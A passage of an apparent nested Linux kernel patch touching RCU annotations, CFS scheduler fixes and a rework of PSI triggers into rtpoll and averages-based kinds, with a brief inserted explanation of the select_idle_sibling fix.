+ 	raw_spin_unlock_irqrestore(&rtp->cbs_gbl_lock, flags);
++
++	if (rcu_task_cb_adjust)
++		pr_info("%s: Setting adjustable number of callback queues.\n", __func__);
++
+ 	pr_info("%s: Setting shift to %d and lim to %d.\n", __func__, data_race(rtp->percpu_enqueue_shift), data_race(rtp->percpu_enqueue_lim));
+ }
+ 
+diff --git a/kernel/rcu/tree_exp.h b/kernel/rcu/tree_exp.h
+index e25321dbb068e..aa3ec3c3b9f75 100644
+--- a/kernel/rcu/tree_exp.h
++++ b/kernel/rcu/tree_exp.h
+@@ -641,7 +641,7 @@ static void synchronize_rcu_expedited_wait(void)
+ 					"O."[!!cpu_online(cpu)],
+ 					"o."[!!(rdp->grpmask & rnp->expmaskinit)],
+ 					"N."[!!(rdp->grpmask & rnp->expmaskinitnext)],
+-					"D."[!!(rdp->cpu_no_qs.b.exp)]);
++					"D."[!!data_race(rdp->cpu_no_qs.b.exp)]);
+ 			}
+ 		}
+ 		pr_cont(" } %lu jiffies s: %lu root: %#lx/%c\n",
+diff --git a/kernel/rcu/tree_plugin.h b/kernel/rcu/tree_plugin.h
+index e3142ee35fc6a..044026abfdd7f 100644
+--- a/kernel/rcu/tree_plugin.h
++++ b/kernel/rcu/tree_plugin.h
+@@ -257,6 +257,8 @@ static void rcu_preempt_ctxt_queue(struct rcu_node *rnp, struct rcu_data *rdp)
+ 	 * GP should not be able to end until we report, so there should be
+ 	 * no need to check for a subsequent expedited GP.  (Though we are
+ 	 * still in a quiescent state in any case.)
++	 *
++	 * Interrupts are disabled, so ->cpu_no_qs.b.exp cannot change.
+ 	 */
+ 	if (blkd_state & RCU_EXP_BLKD && rdp->cpu_no_qs.b.exp)
+ 		rcu_report_exp_rdp(rdp);
+@@ -941,7 +943,7 @@ notrace void rcu_preempt_deferred_qs(struct task_struct *t)
+ {
+ 	struct rcu_data *rdp = this_cpu_ptr(&rcu_data);
+ 
+-	if (rdp->cpu_no_qs.b.exp)
++	if (READ_ONCE(rdp->cpu_no_qs.b.exp))
+ 		rcu_report_exp_rdp(rdp);
+ }
+ 
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index fa33c441ae867..5e5aea2360a87 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -6935,7 +6935,7 @@ static int select_idle_sibling(struct task_struct *p, int prev, int target)
+ 	    recent_used_cpu != target &&
+ 	    cpus_share_cache(recent_used_cpu, target) &&
+ 	    (available_idle_cpu(recent_used_cpu) || sched_idle_cpu(recent_used_cpu)) &&
+-	    cpumask_test_cpu(p->recent_used_cpu, p->cpus_ptr) &&
++	    cpumask_test_cpu(recent_used_cpu, p->cpus_ptr) &&
+ 	    asym_fits_cpu(task_util, util_min, util_max, recent_used_cpu)) {
+ 		return recent_used_cpu;
+ 	}
+@@ -10556,7 +10556,7 @@ static int load_balance(int this_cpu, struct rq *this_rq,
+ 		.sd		= sd,
+ 		.dst_cpu	= this_cpu,
+ 		.dst_rq		= this_rq,
+-		.dst_grpmask    = sched_group_span(sd->groups),
++		.dst_grpmask    = group_balance_mask(sd->groups),
+ 		.idle		= idle,
+ 		.loop_break	= SCHED_NR_MIGRATE_BREAK,
+ 		.cpus		= cpus,
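The select_idle_sibling() one-liner matters because p->recent_used_cpu can be rewritten concurrently; every check in the chain has to run against the single value sampled into recent_used_cpu, not a fresh read of the field. A generic snapshot-then-test sketch (the READ_ONCE() is illustrative; the kernel site uses a plain assignment taken earlier in the function):

    #include <stdio.h>

    #define READ_ONCE(x) (*(const volatile __typeof__(x) *)&(x))

    struct task { int recent_used_cpu; };

    static int pick(struct task *p, int target)
    {
        int recent = READ_ONCE(p->recent_used_cpu);  /* snapshot once */

        /* every later test uses 'recent'; never re-read p->... */
        if (recent >= 0 && recent != target)
            return recent;
        return target;
    }

    int main(void)
    {
        struct task t = { .recent_used_cpu = 3 };

        printf("%d\n", pick(&t, 0));
        return 0;
    }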
+diff --git a/kernel/sched/psi.c b/kernel/sched/psi.c
+index e83c321461cf4..80d8c10e93638 100644
+--- a/kernel/sched/psi.c
++++ b/kernel/sched/psi.c
+@@ -186,17 +186,22 @@ static void group_init(struct psi_group *group)
+ 		seqcount_init(&per_cpu_ptr(group->pcpu, cpu)->seq);
+ 	group->avg_last_update = sched_clock();
+ 	group->avg_next_update = group->avg_last_update + psi_period;
+-	INIT_DELAYED_WORK(&group->avgs_work, psi_avgs_work);
+ 	mutex_init(&group->avgs_lock);
+-	/* Init trigger-related members */
+-	atomic_set(&group->poll_scheduled, 0);
+-	mutex_init(&group->trigger_lock);
+-	INIT_LIST_HEAD(&group->triggers);
+-	group->poll_min_period = U32_MAX;
+-	group->polling_next_update = ULLONG_MAX;
+-	init_waitqueue_head(&group->poll_wait);
+-	timer_setup(&group->poll_timer, poll_timer_fn, 0);
+-	rcu_assign_pointer(group->poll_task, NULL);
++
++	/* Init avg trigger-related members */
++	INIT_LIST_HEAD(&group->avg_triggers);
++	memset(group->avg_nr_triggers, 0, sizeof(group->avg_nr_triggers));
++	INIT_DELAYED_WORK(&group->avgs_work, psi_avgs_work);
++
++	/* Init rtpoll trigger-related members */
++	atomic_set(&group->rtpoll_scheduled, 0);
++	mutex_init(&group->rtpoll_trigger_lock);
++	INIT_LIST_HEAD(&group->rtpoll_triggers);
++	group->rtpoll_min_period = U32_MAX;
++	group->rtpoll_next_update = ULLONG_MAX;
++	init_waitqueue_head(&group->rtpoll_wait);
++	timer_setup(&group->rtpoll_timer, poll_timer_fn, 0);
++	rcu_assign_pointer(group->rtpoll_task, NULL);
+ }
+ 
+ void __init psi_init(void)
+@@ -243,6 +248,8 @@ static void get_recent_times(struct psi_group *group, int cpu,
+ 			     u32 *pchanged_states)
+ {
+ 	struct psi_group_cpu *groupc = per_cpu_ptr(group->pcpu, cpu);
++	int current_cpu = raw_smp_processor_id();
++	unsigned int tasks[NR_PSI_TASK_COUNTS];
+ 	u64 now, state_start;
+ 	enum psi_states s;
+ 	unsigned int seq;
+@@ -257,6 +264,8 @@ static void get_recent_times(struct psi_group *group, int cpu,
+ 		memcpy(times, groupc->times, sizeof(groupc->times));
+ 		state_mask = groupc->state_mask;
+ 		state_start = groupc->state_start;
++		if (cpu == current_cpu)
++			memcpy(tasks, groupc->tasks, sizeof(groupc->tasks));
+ 	} while (read_seqcount_retry(&groupc->seq, seq));
+ 
+ 	/* Calculate state time deltas against the previous snapshot */
+@@ -281,6 +290,28 @@ static void get_recent_times(struct psi_group *group, int cpu,
+ 		if (delta)
+ 			*pchanged_states |= (1 << s);
+ 	}
++
++	/*
++	 * When collect_percpu_times() is called from the avgs_work, we don't want
++	 * to re-arm avgs_work when all CPUs are IDLE. But the current CPU running
++	 * this avgs_work is never IDLE, because avgs_work can't be shut off.
++	 * So for the current CPU, we need to re-arm avgs_work only when
++	 * (NR_RUNNING > 1 || NR_IOWAIT > 0 || NR_MEMSTALL > 0), for other CPUs
++	 * we can just check PSI_NONIDLE delta.
++	 */
++	if (current_work() == &group->avgs_work.work) {
++		bool reschedule;
++
++		if (cpu == current_cpu)
++			reschedule = tasks[NR_RUNNING] +
++				     tasks[NR_IOWAIT] +
++				     tasks[NR_MEMSTALL] > 1;
++		else
++			reschedule = *pchanged_states & (1 << PSI_NONIDLE);
++
++		if (reschedule)
++			*pchanged_states |= PSI_STATE_RESCHEDULE;
++	}
+ }
+ 
+ static void calc_avgs(unsigned long avg[3], int missed_periods,
+@@ -358,94 +389,6 @@ static void collect_percpu_times(struct psi_group *group,
+ 		*pchanged_states = changed_states;
+ }
+ 
+-static u64 update_averages(struct psi_group *group, u64 now)
+-{
+-	unsigned long missed_periods = 0;
+-	u64 expires, period;
+-	u64 avg_next_update;
+-	int s;
+-
+-	/* avgX= */
+-	expires = group->avg_next_update;
+-	if (now - expires >= psi_period)
+-		missed_periods = div_u64(now - expires, psi_period);
+-
+-	/*
+-	 * The periodic clock tick can get delayed for various
+-	 * reasons, especially on loaded systems. To avoid clock
+-	 * drift, we schedule the clock in fixed psi_period intervals.
+-	 * But the deltas we sample out of the per-cpu buckets above
+-	 * are based on the actual time elapsing between clock ticks.
+-	 */
+-	avg_next_update = expires + ((1 + missed_periods) * psi_period);
+-	period = now - (group->avg_last_update + (missed_periods * psi_period));
+-	group->avg_last_update = now;
+-
+-	for (s = 0; s < NR_PSI_STATES - 1; s++) {
+-		u32 sample;
+-
+-		sample = group->total[PSI_AVGS][s] - group->avg_total[s];
+-		/*
+-		 * Due to the lockless sampling of the time buckets,
+-		 * recorded time deltas can slip into the next period,
+-		 * which under full pressure can result in samples in
+-		 * excess of the period length.
+-		 *
+-		 * We don't want to report non-sensical pressures in
+-		 * excess of 100%, nor do we want to drop such events
+-		 * on the floor. Instead we punt any overage into the
+-		 * future until pressure subsides. By doing this we
+-		 * don't underreport the occurring pressure curve, we
+-		 * just report it delayed by one period length.
+-		 *
+-		 * The error isn't cumulative. As soon as another
+-		 * delta slips from a period P to P+1, by definition
+-		 * it frees up its time T in P.
+-		 */
+-		if (sample > period)
+-			sample = period;
+-		group->avg_total[s] += sample;
+-		calc_avgs(group->avg[s], missed_periods, sample, period);
+-	}
+-
+-	return avg_next_update;
+-}
+-
+-static void psi_avgs_work(struct work_struct *work)
+-{
+-	struct delayed_work *dwork;
+-	struct psi_group *group;
+-	u32 changed_states;
+-	bool nonidle;
+-	u64 now;
+-
+-	dwork = to_delayed_work(work);
+-	group = container_of(dwork, struct psi_group, avgs_work);
+-
+-	mutex_lock(&group->avgs_lock);
+-
+-	now = sched_clock();
+-
+-	collect_percpu_times(group, PSI_AVGS, &changed_states);
+-	nonidle = changed_states & (1 << PSI_NONIDLE);
+-	/*
+-	 * If there is task activity, periodically fold the per-cpu
+-	 * times and feed samples into the running averages. If things
+-	 * are idle and there is no data to process, stop the clock.
+-	 * Once restarted, we'll catch up the running averages in one
+-	 * go - see calc_avgs() and missed_periods.
+-	 */
+-	if (now >= group->avg_next_update)
+-		group->avg_next_update = update_averages(group, now);
+-
+-	if (nonidle) {
+-		schedule_delayed_work(dwork, nsecs_to_jiffies(
+-				group->avg_next_update - now) + 1);
+-	}
+-
+-	mutex_unlock(&group->avgs_lock);
+-}
+-
+ /* Trigger tracking window manipulations */
+ static void window_reset(struct psi_window *win, u64 now, u64 value,
+ 			 u64 prev_growth)
+@@ -492,33 +435,32 @@ static u64 window_update(struct psi_window *win, u64 now, u64 value)
+ 	return growth;
+ }
+ 
+-static void init_triggers(struct psi_group *group, u64 now)
++static u64 update_triggers(struct psi_group *group, u64 now, bool *update_total,
++						   enum psi_aggregators aggregator)
+ {
+ 	struct psi_trigger *t;
+-
+-	list_for_each_entry(t, &group->triggers, node)
+-		window_reset(&t->win, now,
+-				group->total[PSI_POLL][t->state], 0);
+-	memcpy(group->polling_total, group->total[PSI_POLL],
+-		   sizeof(group->polling_total));
+-	group->polling_next_update = now + group->poll_min_period;
+-}
+-
+-static u64 update_triggers(struct psi_group *group, u64 now)
+-{
+-	struct psi_trigger *t;
+-	bool update_total = false;
+-	u64 *total = group->total[PSI_POLL];
++	u64 *total = group->total[aggregator];
++	struct list_head *triggers;
++	u64 *aggregator_total;
++	*update_total = false;
++
++	if (aggregator == PSI_AVGS) {
++		triggers = &group->avg_triggers;
++		aggregator_total = group->avg_total;
++	} else {
++		triggers = &group->rtpoll_triggers;
++		aggregator_total = group->rtpoll_total;
++	}
+ 
+ 	/*
+ 	 * On subsequent updates, calculate growth deltas and let
+ 	 * watchers know when their specified thresholds are exceeded.
+ 	 */
+-	list_for_each_entry(t, &group->triggers, node) {
++	list_for_each_entry(t, triggers, node) {
+ 		u64 growth;
+ 		bool new_stall;
+ 
+-		new_stall = group->polling_total[t->state] != total[t->state];
++		new_stall = aggregator_total[t->state] != total[t->state];
+ 
+ 		/* Check for stall activity or a previous threshold breach */
+ 		if (!new_stall && !t->pending_event)
+@@ -536,7 +478,7 @@ static u64 update_triggers(struct psi_group *group, u64 now)
+ 			 * been through all of them. Also remember to extend the
+ 			 * polling time if we see new stall activity.
+ 			 */
+-			update_total = true;
++			*update_total = true;
+ 
+ 			/* Calculate growth since last update */
+ 			growth = window_update(&t->win, now, total[t->state]);
+@@ -552,59 +494,161 @@ static u64 update_triggers(struct psi_group *group, u64 now)
+ 			continue;
+ 
+ 		/* Generate an event */
+-		if (cmpxchg(&t->event, 0, 1) == 0)
+-			wake_up_interruptible(&t->event_wait);
++		if (cmpxchg(&t->event, 0, 1) == 0) {
++			if (t->of)
++				kernfs_notify(t->of->kn);
++			else
++				wake_up_interruptible(&t->event_wait);
++		}
+ 		t->last_event_time = now;
+ 		/* Reset threshold breach flag once event got generated */
+ 		t->pending_event = false;
+ 	}
+ 
+-	if (update_total)
+-		memcpy(group->polling_total, total,
+-				sizeof(group->polling_total));
++	return now + group->rtpoll_min_period;
++}
++
++static u64 update_averages(struct psi_group *group, u64 now)
++{
++	unsigned long missed_periods = 0;
++	u64 expires, period;
++	u64 avg_next_update;
++	int s;
++
++	/* avgX= */
++	expires = group->avg_next_update;
++	if (now - expires >= psi_period)
++		missed_periods = div_u64(now - expires, psi_period);
++
++	/*
++	 * The periodic clock tick can get delayed for various
++	 * reasons, especially on loaded systems. To avoid clock
++	 * drift, we schedule the clock in fixed psi_period intervals.
++	 * But the deltas we sample out of the per-cpu buckets above
++	 * are based on the actual time elapsing between clock ticks.
++	 */
++	avg_next_update = expires + ((1 + missed_periods) * psi_period);
++	period = now - (group->avg_last_update + (missed_periods * psi_period));
++	group->avg_last_update = now;
++
++	for (s = 0; s < NR_PSI_STATES - 1; s++) {
++		u32 sample;
++
++		sample = group->total[PSI_AVGS][s] - group->avg_total[s];
++		/*
++		 * Due to the lockless sampling of the time buckets,
++		 * recorded time deltas can slip into the next period,
++		 * which under full pressure can result in samples in
++		 * excess of the period length.
++		 *
++		 * We don't want to report non-sensical pressures in
++		 * excess of 100%, nor do we want to drop such events
++		 * on the floor. Instead we punt any overage into the
++		 * future until pressure subsides. By doing this we
++		 * don't underreport the occurring pressure curve, we
++		 * just report it delayed by one period length.
++		 *
++		 * The error isn't cumulative. As soon as another
++		 * delta slips from a period P to P+1, by definition
++		 * it frees up its time T in P.
++		 */
++		if (sample > period)
++			sample = period;
++		group->avg_total[s] += sample;
++		calc_avgs(group->avg[s], missed_periods, sample, period);
++	}
++
++	return avg_next_update;
++}
++
++static void psi_avgs_work(struct work_struct *work)
++{
++	struct delayed_work *dwork;
++	struct psi_group *group;
++	u32 changed_states;
++	bool update_total;
++	u64 now;
+ 
+-	return now + group->poll_min_period;
++	dwork = to_delayed_work(work);
++	group = container_of(dwork, struct psi_group, avgs_work);
++
++	mutex_lock(&group->avgs_lock);
++
++	now = sched_clock();
++
++	collect_percpu_times(group, PSI_AVGS, &changed_states);
++	/*
++	 * If there is task activity, periodically fold the per-cpu
++	 * times and feed samples into the running averages. If things
++	 * are idle and there is no data to process, stop the clock.
++	 * Once restarted, we'll catch up the running averages in one
++	 * go - see calc_avgs() and missed_periods.
++	 */
++	if (now >= group->avg_next_update) {
++		update_triggers(group, now, &update_total, PSI_AVGS);
++		group->avg_next_update = update_averages(group, now);
++	}
++
++	if (changed_states & PSI_STATE_RESCHEDULE) {
++		schedule_delayed_work(dwork, nsecs_to_jiffies(
++				group->avg_next_update - now) + 1);
++	}
++
++	mutex_unlock(&group->avgs_lock);
++}
++
++static void init_rtpoll_triggers(struct psi_group *group, u64 now)
++{
++	struct psi_trigger *t;
++
++	list_for_each_entry(t, &group->rtpoll_triggers, node)
++		window_reset(&t->win, now,
++				group->total[PSI_POLL][t->state], 0);
++	memcpy(group->rtpoll_total, group->total[PSI_POLL],
++		   sizeof(group->rtpoll_total));
++	group->rtpoll_next_update = now + group->rtpoll_min_period;
+ }
+ 
+ /* Schedule polling if it's not already scheduled or forced. */
+-static void psi_schedule_poll_work(struct psi_group *group, unsigned long delay,
++static void psi_schedule_rtpoll_work(struct psi_group *group, unsigned long delay,
+ 				   bool force)
+ {
+ 	struct task_struct *task;
+ 
+ 	/*
+ 	 * atomic_xchg should be called even when !force to provide a
+-	 * full memory barrier (see the comment inside psi_poll_work).
++	 * full memory barrier (see the comment inside psi_rtpoll_work).
+ 	 */
+-	if (atomic_xchg(&group->poll_scheduled, 1) && !force)
++	if (atomic_xchg(&group->rtpoll_scheduled, 1) && !force)
+ 		return;
+ 
+ 	rcu_read_lock();
+ 
+-	task = rcu_dereference(group->poll_task);
++	task = rcu_dereference(group->rtpoll_task);
+ 	/*
+ 	 * kworker might be NULL in case psi_trigger_destroy races with
+ 	 * psi_task_change (hotpath) which can't use locks
+ 	 */
+ 	if (likely(task))
+-		mod_timer(&group->poll_timer, jiffies + delay);
++		mod_timer(&group->rtpoll_timer, jiffies + delay);
+ 	else
+-		atomic_set(&group->poll_scheduled, 0);
++		atomic_set(&group->rtpoll_scheduled, 0);
+ 
+ 	rcu_read_unlock();
+ }
+ 
+-static void psi_poll_work(struct psi_group *group)
++static void psi_rtpoll_work(struct psi_group *group)
+ {
+ 	bool force_reschedule = false;
+ 	u32 changed_states;
++	bool update_total;
+ 	u64 now;
+ 
+-	mutex_lock(&group->trigger_lock);
++	mutex_lock(&group->rtpoll_trigger_lock);
+ 
+ 	now = sched_clock();
+ 
+-	if (now > group->polling_until) {
++	if (now > group->rtpoll_until) {
+ 		/*
+ 		 * We are either about to start or might stop polling if no
+ 		 * state change was recorded. Resetting poll_scheduled leaves
+@@ -614,7 +658,7 @@ static void psi_poll_work(struct psi_group *group)
+ 		 * should be negligible and polling_next_update still keeps
+ 		 * updates correctly on schedule.
+ 		 */
+-		atomic_set(&group->poll_scheduled, 0);
++		atomic_set(&group->rtpoll_scheduled, 0);
+ 		/*
+ 		 * A task change can race with the poll worker that is supposed to
+ 		 * report on it. To avoid missing events, ensure ordering between
+@@ -643,60 +687,64 @@ static void psi_poll_work(struct psi_group *group)
+ 
+ 	collect_percpu_times(group, PSI_POLL, &changed_states);
+ 
+-	if (changed_states & group->poll_states) {
++	if (changed_states & group->rtpoll_states) {
+ 		/* Initialize trigger windows when entering polling mode */
+-		if (now > group->polling_until)
+-			init_triggers(group, now);
++		if (now > group->rtpoll_until)
++			init_rtpoll_triggers(group, now);
+ 
+ 		/*
+ 		 * Keep the monitor active for at least the duration of the
+ 		 * minimum tracking window as long as monitor states are
+ 		 * changing.
+ 		 */
+-		group->polling_until = now +
+-			group->poll_min_period * UPDATES_PER_WINDOW;
++		group->rtpoll_until = now +
++			group->rtpoll_min_period * UPDATES_PER_WINDOW;
+ 	}
+ 
+-	if (now > group->polling_until) {
+-		group->polling_next_update = ULLONG_MAX;
++	if (now > group->rtpoll_until) {
++		group->rtpoll_next_update = ULLONG_MAX;
+ 		goto out;
+ 	}
+ 
+-	if (now >= group->polling_next_update)
+-		group->polling_next_update = update_triggers(group, now);
++	if (now >= group->rtpoll_next_update) {
++		group->rtpoll_next_update = update_triggers(group, now, &update_total, PSI_POLL);
++		if (update_total)
++			memcpy(group->rtpoll_total, group->total[PSI_POLL],
++				   sizeof(group->rtpoll_total));
++	}
+ 
+-	psi_schedule_poll_work(group,
+-		nsecs_to_jiffies(group->polling_next_update - now) + 1,
++	psi_schedule_rtpoll_work(group,
++		nsecs_to_jiffies(group->rtpoll_next_update - now) + 1,
+ 		force_reschedule);
+ 
+ out:
+-	mutex_unlock(&group->trigger_lock);
++	mutex_unlock(&group->rtpoll_trigger_lock);
+ }
+ 
+-static int psi_poll_worker(void *data)
++static int psi_rtpoll_worker(void *data)
+ {
+ 	struct psi_group *group = (struct psi_group *)data;
+ 
+ 	sched_set_fifo_low(current);
+ 
+ 	while (true) {
+-		wait_event_interruptible(group->poll_wait,
+-				atomic_cmpxchg(&group->poll_wakeup, 1, 0) ||
++		wait_event_interruptible(group->rtpoll_wait,
++				atomic_cmpxchg(&group->rtpoll_wakeup, 1, 0) ||
+ 				kthread_should_stop());
+ 		if (kthread_should_stop())
+ 			break;
+ 
+-		psi_poll_work(group);
++		psi_rtpoll_work(group);
+ 	}
+ 	return 0;
+ }
+ 
+ static void poll_timer_fn(struct timer_list *t)
+ {
+-	struct psi_group *group = from_timer(group, t, poll_timer);
++	struct psi_group *group = from_timer(group, t, rtpoll_timer);
+ 
+-	atomic_set(&group->poll_wakeup, 1);
+-	wake_up_interruptible(&group->poll_wait);
++	atomic_set(&group->rtpoll_wakeup, 1);
++	wake_up_interruptible(&group->rtpoll_wait);
+ }
+ 
+ static void record_times(struct psi_group_cpu *groupc, u64 now)
+@@ -827,8 +875,8 @@ static void psi_group_change(struct psi_group *group, int cpu,
+ 
+ 	write_seqcount_end(&groupc->seq);
+ 
+-	if (state_mask & group->poll_states)
+-		psi_schedule_poll_work(group, 1, false);
++	if (state_mask & group->rtpoll_states)
++		psi_schedule_rtpoll_work(group, 1, false);
+ 
+ 	if (wake_clock && !delayed_work_pending(&group->avgs_work))
+ 		schedule_delayed_work(&group->avgs_work, PSI_FREQ);
+@@ -981,8 +1029,8 @@ void psi_account_irqtime(struct task_struct *task, u32 delta)
+ 
+ 		write_seqcount_end(&groupc->seq);
+ 
+-		if (group->poll_states & (1 << PSI_IRQ_FULL))
+-			psi_schedule_poll_work(group, 1, false);
++		if (group->rtpoll_states & (1 << PSI_IRQ_FULL))
++			psi_schedule_rtpoll_work(group, 1, false);
+ 	} while ((group = group->parent));
+ }
+ #endif
+@@ -1077,7 +1125,7 @@ void psi_cgroup_free(struct cgroup *cgroup)
+ 	cancel_delayed_work_sync(&cgroup->psi->avgs_work);
+ 	free_percpu(cgroup->psi->pcpu);
+ 	/* All triggers must be removed by now */
+-	WARN_ONCE(cgroup->psi->poll_states, "psi: trigger leak\n");
++	WARN_ONCE(cgroup->psi->rtpoll_states, "psi: trigger leak\n");
+ 	kfree(cgroup->psi);
+ }
+ 
+@@ -1228,17 +1276,25 @@ int psi_show(struct seq_file *m, struct psi_group *group, enum psi_res res)
+ 	return 0;
+ }
+ 
+-struct psi_trigger *psi_trigger_create(struct psi_group *group,
+-			char *buf, enum psi_res res)
++struct psi_trigger *psi_trigger_create(struct psi_group *group, char *buf,
++				       enum psi_res res, struct file *file,
++				       struct kernfs_open_file *of)
+ {
+ 	struct psi_trigger *t;
+ 	enum psi_states state;
+ 	u32 threshold_us;
++	bool privileged;
+ 	u32 window_us;
+ 
+ 	if (static_branch_likely(&psi_disabled))
+ 		return ERR_PTR(-EOPNOTSUPP);
+ 
++	/*
++	 * Checking the privilege here on file->f_cred implies that a privileged user
++	 * could open the file and delegate the write to an unprivileged one.
++	 */
++	privileged = cap_raised(file->f_cred->cap_effective, CAP_SYS_RESOURCE);
++
+ 	if (sscanf(buf, "some %u %u", &threshold_us, &window_us) == 2)
+ 		state = PSI_IO_SOME + res * 2;
+ 	else if (sscanf(buf, "full %u %u", &threshold_us, &window_us) == 2)
+@@ -1258,6 +1314,13 @@ struct psi_trigger *psi_trigger_create(struct psi_group *group,
+ 		window_us > WINDOW_MAX_US)
+ 		return ERR_PTR(-EINVAL);
+ 
++	/*
++	 * Unprivileged users can only use 2s windows so that averages aggregation
++	 * work is used, and no RT threads need to be spawned.
++	 */
++	if (!privileged && window_us % 2000000)
++		return ERR_PTR(-EINVAL);
++
+ 	/* Check threshold */
+ 	if (threshold_us == 0 || threshold_us > window_us)
+ 		return ERR_PTR(-EINVAL);
+@@ -1275,33 +1338,44 @@ struct psi_trigger *psi_trigger_create(struct psi_group *group,
+ 
+ 	t->event = 0;
+ 	t->last_event_time = 0;
+-	init_waitqueue_head(&t->event_wait);
++	t->of = of;
++	if (!of)
++		init_waitqueue_head(&t->event_wait);
+ 	t->pending_event = false;
++	t->aggregator = privileged ? PSI_POLL : PSI_AVGS;
+ 
+-	mutex_lock(&group->trigger_lock);
++	if (privileged) {
++		mutex_lock(&group->rtpoll_trigger_lock);
+ 
+-	if (!rcu_access_pointer(group->poll_task)) {
+-		struct task_struct *task;
++		if (!rcu_access_pointer(group->rtpoll_task)) {
++			struct task_struct *task;
+ 
+-		task = kthread_create(psi_poll_worker, group, "psimon");
+-		if (IS_ERR(task)) {
+-			kfree(t);
+-			mutex_unlock(&group->trigger_lock);
+-			return ERR_CAST(task);
++			task = kthread_create(psi_rtpoll_worker, group, "psimon");
++			if (IS_ERR(task)) {
++				kfree(t);
++				mutex_unlock(&group->rtpoll_trigger_lock);
++				return ERR_CAST(task);
++			}
++			atomic_set(&group->rtpoll_wakeup, 0);
++			wake_up_process(task);
++			rcu_assign_pointer(group->rtpoll_task, task);
+ 		}
+-		atomic_set(&group->poll_wakeup, 0);
+-		wake_up_process(task);
+-		rcu_assign_pointer(group->poll_task, task);
+-	}
+ 
+-	list_add(&t->node, &group->triggers);
+-	group->poll_min_period = min(group->poll_min_period,
+-		div_u64(t->win.size, UPDATES_PER_WINDOW));
+-	group->nr_triggers[t->state]++;
+-	group->poll_states |= (1 << t->state);
++		list_add(&t->node, &group->rtpoll_triggers);
++		group->rtpoll_min_period = min(group->rtpoll_min_period,
++			div_u64(t->win.size, UPDATES_PER_WINDOW));
++		group->rtpoll_nr_triggers[t->state]++;
++		group->rtpoll_states |= (1 << t->state);
+ 
+-	mutex_unlock(&group->trigger_lock);
++		mutex_unlock(&group->rtpoll_trigger_lock);
++	} else {
++		mutex_lock(&group->avgs_lock);
+ 
++		list_add(&t->node, &group->avg_triggers);
++		group->avg_nr_triggers[t->state]++;
++
++		mutex_unlock(&group->avgs_lock);
++	}
+ 	return t;
+ }
+ 
+@@ -1323,53 +1397,64 @@ void psi_trigger_destroy(struct psi_trigger *t)
+ 	 * being accessed later. Can happen if cgroup is deleted from under a
+ 	 * polling process.
+ 	 */
+-	wake_up_pollfree(&t->event_wait);
+-
+-	mutex_lock(&group->trigger_lock);
+-
+-	if (!list_empty(&t->node)) {
+-		struct psi_trigger *tmp;
+-		u64 period = ULLONG_MAX;
+-
+-		list_del(&t->node);
+-		group->nr_triggers[t->state]--;
+-		if (!group->nr_triggers[t->state])
+-			group->poll_states &= ~(1 << t->state);
+-		/* reset min update period for the remaining triggers */
+-		list_for_each_entry(tmp, &group->triggers, node)
+-			period = min(period, div_u64(tmp->win.size,
+-					UPDATES_PER_WINDOW));
+-		group->poll_min_period = period;
+-		/* Destroy poll_task when the last trigger is destroyed */
+-		if (group->poll_states == 0) {
+-			group->polling_until = 0;
+-			task_to_destroy = rcu_dereference_protected(
+-					group->poll_task,
+-					lockdep_is_held(&group->trigger_lock));
+-			rcu_assign_pointer(group->poll_task, NULL);
+-			del_timer(&group->poll_timer);
++	if (t->of)
++		kernfs_notify(t->of->kn);
++	else
++		wake_up_interruptible(&t->event_wait);
++
++	if (t->aggregator == PSI_AVGS) {
++		mutex_lock(&group->avgs_lock);
++		if (!list_empty(&t->node)) {
++			list_del(&t->node);
++			group->avg_nr_triggers[t->state]--;
++		}
++		mutex_unlock(&group->avgs_lock);
++	} else {
++		mutex_lock(&group->rtpoll_trigger_lock);
++		if (!list_empty(&t->node)) {
++			struct psi_trigger *tmp;
++			u64 period = ULLONG_MAX;
++
++			list_del(&t->node);
++			group->rtpoll_nr_triggers[t->state]--;
++			if (!group->rtpoll_nr_triggers[t->state])
++				group->rtpoll_states &= ~(1 << t->state);
++			/* reset min update period for the remaining triggers */
++			list_for_each_entry(tmp, &group->rtpoll_triggers, node)
++				period = min(period, div_u64(tmp->win.size,
++						UPDATES_PER_WINDOW));
++			group->rtpoll_min_period = period;
++			/* Destroy rtpoll_task when the last trigger is destroyed */
++			if (group->rtpoll_states == 0) {
++				group->rtpoll_until = 0;
++				task_to_destroy = rcu_dereference_protected(
++						group->rtpoll_task,
++						lockdep_is_held(&group->rtpoll_trigger_lock));
++				rcu_assign_pointer(group->rtpoll_task, NULL);
++				del_timer(&group->rtpoll_timer);
++			}
+ 		}
++		mutex_unlock(&group->rtpoll_trigger_lock);
+ 	}
+ 
+-	mutex_unlock(&group->trigger_lock);
+-
+ 	/*
+-	 * Wait for psi_schedule_poll_work RCU to complete its read-side
++	 * Wait for psi_schedule_rtpoll_work RCU to complete its read-side
+ 	 * critical section before destroying the trigger and optionally the
+-	 * poll_task.
++	 * rtpoll_task.
+ 	 */
+ 	synchronize_rcu();
+ 	/*
+-	 * Stop kthread 'psimon' after releasing trigger_lock to prevent a
+-	 * deadlock while waiting for psi_poll_work to acquire trigger_lock
++	 * Stop kthread 'psimon' after releasing rtpoll_trigger_lock to prevent
++	 * a deadlock while waiting for psi_rtpoll_work to acquire
++	 * rtpoll_trigger_lock
+ 	 */
+ 	if (task_to_destroy) {
+ 		/*
+ 		 * After the RCU grace period has expired, the worker
+-		 * can no longer be found through group->poll_task.
++		 * can no longer be found through group->rtpoll_task.
+ 		 */
+ 		kthread_stop(task_to_destroy);
+-		atomic_set(&group->poll_scheduled, 0);
++		atomic_set(&group->rtpoll_scheduled, 0);
+ 	}
+ 	kfree(t);
+ }
+@@ -1387,7 +1472,10 @@ __poll_t psi_trigger_poll(void **trigger_ptr,
+ 	if (!t)
+ 		return DEFAULT_POLLMASK | EPOLLERR | EPOLLPRI;
+ 
+-	poll_wait(file, &t->event_wait, wait);
++	if (t->of)
++		kernfs_generic_poll(t->of, wait);
++	else
++		poll_wait(file, &t->event_wait, wait);
+ 
+ 	if (cmpxchg(&t->event, 1, 0) == 1)
+ 		ret |= EPOLLPRI;
+@@ -1411,27 +1499,19 @@ static int psi_cpu_show(struct seq_file *m, void *v)
+ 	return psi_show(m, &psi_system, PSI_CPU);
+ }
+ 
+-static int psi_open(struct file *file, int (*psi_show)(struct seq_file *, void *))
+-{
+-	if (file->f_mode & FMODE_WRITE && !capable(CAP_SYS_RESOURCE))
+-		return -EPERM;
+-
+-	return single_open(file, psi_show, NULL);
+-}
+-
